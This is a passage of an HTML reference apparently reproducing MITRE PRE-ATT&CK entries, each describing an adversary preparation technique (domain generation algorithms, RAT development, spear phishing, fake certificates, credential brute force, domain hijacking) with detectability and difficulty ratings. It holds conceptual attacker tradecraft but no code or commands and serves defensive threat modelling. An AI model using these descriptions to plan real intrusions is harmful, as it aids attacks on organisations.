<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1459. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1012">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1012</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_procure_required_equipment_and_software_pre_t1112"><a class="anchor" href="#_procure_required_equipment_and_software_pre_t1112"></a><a class="link" href="#_procure_required_equipment_and_software_pre_t1112">Procure required equipment and software - PRE-T1112</a></h3>
<div class="paragraph">
<p>An adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Outside of highly specific or rare HW, nearly impossible to detect and track.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Ease and availability of current hardware and software, mobile phones (cash and go phones), and additional online technology simplifies adversary process to achieve this technique (and possibly without traceability). The adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [<a href="https://aws.amazon.com" class="bare">https://aws.amazon.com</a> AWS], VPS).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1460. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1112">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1112</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_security_defensive_capabilities_pre_t1040"><a class="anchor" href="#_identify_security_defensive_capabilities_pre_t1040"></a><a class="link" href="#_identify_security_defensive_capabilities_pre_t1040">Identify security defensive capabilities - PRE-T1040</a></h3>
<div class="paragraph">
<p>Security defensive capabilities are designed to stop or limit unauthorized network traffic or other types of accesses. (Citation: OSFingerprinting2014) (Citation: NMAP WAF NSE)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Technically, the defender has the ability to detect. However, this is typically not performed as this type of traffic would likely not prompt the defender to take any actionable defense. In addition, this would require the defender to closely review their access logs for any suspicious activity (if the activity is even logged).</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: The adversary will have some insight into defenses based on dropped traffic or filtered responses. It is more difficult to pinpoint which defenses are implemented (e.g., [<a href="https://www.fireeye.com" class="bare">https://www.fireeye.com</a> FireEye] WMPS, [<a href="https://www.hpe.com" class="bare">https://www.hpe.com</a> Hewlett Packard Enterprise] Tipping Point IPS).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1461. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1040">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1040</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_derive_intelligence_requirements_pre_t1007"><a class="anchor" href="#_derive_intelligence_requirements_pre_t1007"></a><a class="link" href="#_derive_intelligence_requirements_pre_t1007">Derive intelligence requirements - PRE-T1007</a></h3>
<div class="paragraph">
<p>Leadership or key decision makers may derive specific intelligence requirements from Key Intelligence Topics (KITs) or Key Intelligence Questions (KIQs). Specific intelligence requirements assist analysts in gathering information to establish a baseline of information about a topic or question and collection managers to clarify the types of information that should be collected to satisfy the requirement. (Citation: LowenthalCh4) (Citation: Heffter)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1462. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1007">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1007</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_domain_generation_algorithms_dga_pre_t1100"><a class="anchor" href="#_domain_generation_algorithms_dga_pre_t1100"></a><a class="link" href="#_domain_generation_algorithms_dga_pre_t1100">Domain Generation Algorithms (DGA) - PRE-T1100</a></h3>
<div class="paragraph">
<p>The use of algorithms in malware to periodically generate a large number of domain names which function as rendezvous points for malware command and control servers. (Citation: DamballaDGA) (Citation: DambballaDGACyberCriminals)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: It is possible to detect the use of DGAs; however, defenders have largely not been successful at mitigating the domains because they are generally registered less than an hour before they are used and disposed of within 24 hours.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This technique does not require a significant amount of sophistication while still being highly effective. It was popularized by the Conficker worms but is prevalent in crimeware such as Murofet and BankPatch.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1463. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1100">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1100</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_leverage_compromised_3rd_party_resources_pre_t1152"><a class="anchor" href="#_leverage_compromised_3rd_party_resources_pre_t1152"></a><a class="link" href="#_leverage_compromised_3rd_party_resources_pre_t1152">Leverage compromised 3rd party resources - PRE-T1152</a></h3>
<div class="paragraph">
<p>The utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: While possible to detect, it requires a broader vantage point than is typical that provides increased insight and conducts extensive data analysis and correlation between events.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Conducting technique requires either nation-state level capabilities or large amounts of financing to coordinate multiple 3rd party resources to gain desired insight.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1464. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1152">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1152</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_review_logs_and_residual_traces_pre_t1135"><a class="anchor" href="#_review_logs_and_residual_traces_pre_t1135"></a><a class="link" href="#_review_logs_and_residual_traces_pre_t1135">Review logs and residual traces - PRE-T1135</a></h3>
<div class="paragraph">
<p>Execution of code and network communications often result in logging or other system or network forensic artifacts. An adversary can run their code to identify what is recorded under different conditions. This may result in changes to their code or adding additional actions (such as deleting a record from a log) to the code. (Citation: EDB-39007) (Citation: infosec-covering-tracks)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary controls the test and defender likely has no visibility.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary has full control of environment to determine what level of auditing and traces exist on a system after execution.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1465. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1135">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1135</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_job_postings_and_needs_gaps_pre_t1025"><a class="anchor" href="#_identify_job_postings_and_needs_gaps_pre_t1025"></a><a class="link" href="#_identify_job_postings_and_needs_gaps_pre_t1025">Identify job postings and needs/gaps - PRE-T1025</a></h3>
<div class="paragraph">
<p>Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in attack or provide insight in to possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Impossible to differentiate between an adversary and a normal user when accessing open/public information.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Publicly posted information by design. Providing too much detail in the job posting could aid the adversary in learning more about the target&#8217;s environment and possible technical weaknesses/deficiencies.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1466. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1025">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1025</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spear_phishing_messages_with_malicious_attachments_pre_t1144"><a class="anchor" href="#_spear_phishing_messages_with_malicious_attachments_pre_t1144"></a><a class="link" href="#_spear_phishing_messages_with_malicious_attachments_pre_t1144">Spear phishing messages with malicious attachments - PRE-T1144</a></h3>
<div class="paragraph">
<p>Emails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Many technologies exist to scan content and/or emulate a workstation prior to the target receiving and executing the attachment (detonation chambers) in order to reduce malicious emails and attachments being delivered to the intended target. However, encryption continues to be a stumbling block. In addition, there are a variety of commercial technologies available that enable users to screen for phishing messages and which are designed to enhance email security.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Sending the emails is the simple part, ensuring they make it to the target (e.g., not being filtered) may be challenging. Over time, an adversary refines their techniques to minimize detection by making their emails seem legitimate in structure and content.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1467. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1144">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1144</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ssl_certificate_acquisition_for_trust_breaking_pre_t1115"><a class="anchor" href="#_ssl_certificate_acquisition_for_trust_breaking_pre_t1115"></a><a class="link" href="#_ssl_certificate_acquisition_for_trust_breaking_pre_t1115">SSL certificate acquisition for trust breaking - PRE-T1115</a></h3>
<div class="paragraph">
<p>Fake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: The certificate authority who is hacked cannot easily see they&#8217;ve been compromised, but [<a href="https://www.google.com" class="bare">https://www.google.com</a> Google] has caught on to this occurring in previous attacks such as DigiNotar (Citation: DigiNotar2016) and [<a href="https://www.verisign.com" class="bare">https://www.verisign.com</a> Verisign].</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: One example of it occurring in the real world is the DigiNotar (Citation: DigiNotar2016) case. To be able to do this usually requires sophisticated skills and is traditionally done by a nation state to spy on its citizens.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1468. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1115">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1115</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_proxy_protocol_relays_pre_t1081"><a class="anchor" href="#_proxy_protocol_relays_pre_t1081"></a><a class="link" href="#_proxy_protocol_relays_pre_t1081">Proxy/protocol relays - PRE-T1081</a></h3>
<div class="paragraph">
<p>Proxies act as an intermediary for clients seeking resources from other systems. Using a proxy may make it more difficult to track back the origin of a network communication. (Citation: APT1)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defenders with standard capabilities will traditionally be able to see the first hop but not all the subsequent earlier hops an adversary takes to be able to conduct reconnaissance.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Proxies are readily available for the adversary with both free and cost-based options available.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1469. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1081">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1081</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_domain_and_ip_address_space_pre_t1027"><a class="anchor" href="#_determine_domain_and_ip_address_space_pre_t1027"></a><a class="link" href="#_determine_domain_and_ip_address_space_pre_t1027">Determine domain and IP address space - PRE-T1027</a></h3>
<div class="paragraph">
<p>Domain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Public or easily obtainable information by design.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: AS and IANA data are easily available, existing research tools.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1470. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1027">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1027</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_access_tool_development_pre_t1128"><a class="anchor" href="#_remote_access_tool_development_pre_t1128"></a><a class="link" href="#_remote_access_tool_development_pre_t1128">Remote access tool development - PRE-T1128</a></h3>
<div class="paragraph">
<p>A remote access tool (RAT) is a piece of software that allows a remote user to control a system as if they had physical access to that system. An adversary may utilize existing RATs, modify existing RATs, or create their own RAT. (Citation: ActiveMalwareEnergy)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary will likely use code repositories, but development will be performed on their local systems.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Many successful RATs exist for re-use/tailoring in addition to those an adversary may choose to build from scratch. The adversary&#8217;s capabilities, target sensitivity, and needs will likely determine whether a previous RAT is modified for use a new one is built from scratch.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1471. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1128">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1128</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_push_notification_client_side_exploit_pre_t1150"><a class="anchor" href="#_push_notification_client_side_exploit_pre_t1150"></a><a class="link" href="#_push_notification_client_side_exploit_pre_t1150">Push-notification client-side exploit - PRE-T1150</a></h3>
<div class="paragraph">
<p>A technique to push an [<a href="https://www.apple.com/ios" class="bare">https://www.apple.com/ios</a> iOS] or [<a href="https://www.android.com" class="bare">https://www.android.com</a> Android] MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: For non-corporate cellular devices not joined to the corporate network, it is not possible to detect an adversary&#8217;s use of the technique because messages traverse networks outside of the control of the employer. For corporate cellular devices which are joined to the corporate network, monitoring of messages and ability to patch against push attacks is possible, assuming they are fully monitored.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Easily executed technique to push an MMS-type message to the target which does not require interaction on the part of the target to be successful.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1472. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1150">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1150</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_authorized_user_performs_requested_cyber_action_pre_t1163"><a class="anchor" href="#_authorized_user_performs_requested_cyber_action_pre_t1163"></a><a class="link" href="#_authorized_user_performs_requested_cyber_action_pre_t1163">Authorized user performs requested cyber action - PRE-T1163</a></h3>
<div class="paragraph">
<p>Clicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Some environments have anti-spearphishing mechanisms to detect or block the link before it reaches the user.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Users unwittingly click on spearphishing links frequently, despite training designed to educate about the perils of spearphishing.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1473. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1163">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1163</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_submit_kits_kiqs_and_intelligence_requirements_pre_t1014"><a class="anchor" href="#_submit_kits_kiqs_and_intelligence_requirements_pre_t1014"></a><a class="link" href="#_submit_kits_kiqs_and_intelligence_requirements_pre_t1014">Submit KITs, KIQs, and intelligence requirements - PRE-T1014</a></h3>
<div class="paragraph">
<p>Once they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1474. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1014">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1014</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_misattributable_credentials_pre_t1099"><a class="anchor" href="#_misattributable_credentials_pre_t1099"></a><a class="link" href="#_misattributable_credentials_pre_t1099">Misattributable credentials - PRE-T1099</a></h3>
<div class="paragraph">
<p>The use of credentials by an adversary with the intent to hide their true identity and/or portray them self as another person or entity. An adversary may use misattributable credentials in an attack to convince a victim that credentials are legitimate and trustworthy when this is not actually the case. (Citation: FakeSSLCerts)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: If a previous incident identified the credentials used by an adversary, defenders can potentially use these credentials to track the adversary through reuse of the same credentials.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: An adversary can easily create and use misattributable credentials to obtain servers, build environment, [<a href="https://aws.amazon.com" class="bare">https://aws.amazon.com</a> AWS] accounts, etc. Many service providers require some form of identifiable information such as a phone number or email address, but there are several avenues to acquire these consistent with the misattributable identity.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1475. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1099">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1099</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_create_strategic_plan_pre_t1008"><a class="anchor" href="#_create_strategic_plan_pre_t1008"></a><a class="link" href="#_create_strategic_plan_pre_t1008">Create strategic plan - PRE-T1008</a></h3>
<div class="paragraph">
<p>Strategic plans outline the mission, vision, and goals for an adversary at a high level in relation to the key partners, topics, and functions the adversary carries out. (Citation: KPMGChina5Year) (Citation: China5YearPlans) (Citation: ChinaUN)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1476. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1008">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1008</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_assess_vulnerability_of_3rd_party_vendors_pre_t1075"><a class="anchor" href="#_assess_vulnerability_of_3rd_party_vendors_pre_t1075"></a><a class="link" href="#_assess_vulnerability_of_3rd_party_vendors_pre_t1075">Assess vulnerability of 3rd party vendors - PRE-T1075</a></h3>
<div class="paragraph">
<p>Once a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: 3rd parties would most likely not report network scans to their partners. Target network would not know that their 3rd party partners were being used as a vector.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: The difficult part is enumerating all 3rd parties. Finding major partners would not be difficult. Significantly easier with insider knowledge. Vulnerability scanning the 3rd party networks is trivial.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1477. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1075">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1075</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_authentication_attempt_pre_t1158"><a class="anchor" href="#_authentication_attempt_pre_t1158"></a><a class="link" href="#_authentication_attempt_pre_t1158">Authentication attempt - PRE-T1158</a></h3>
<div class="paragraph">
<p>Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials to authenticate remotely. This access could be to a web portal, through a VPN, or in a phone app. (Citation: Remote Access Healthcare) (Citation: RDP Point of Sale)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This is possible with diligent monitoring of login anomalies, expected user behavior/location. If the adversary uses legitimate credentials, it may go undetected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials. This is increasingly difficult to obtain access when two-factor authentication mechanisms are employed.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1478. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1158">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1158</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_domain_registration_hijacking_pre_t1103"><a class="anchor" href="#_domain_registration_hijacking_pre_t1103"></a><a class="link" href="#_domain_registration_hijacking_pre_t1103">Domain registration hijacking - PRE-T1103</a></h3>
<div class="paragraph">
<p>Domain Registration Hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Generally not easily detectable unless domain registrar provides alerting on any updates.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
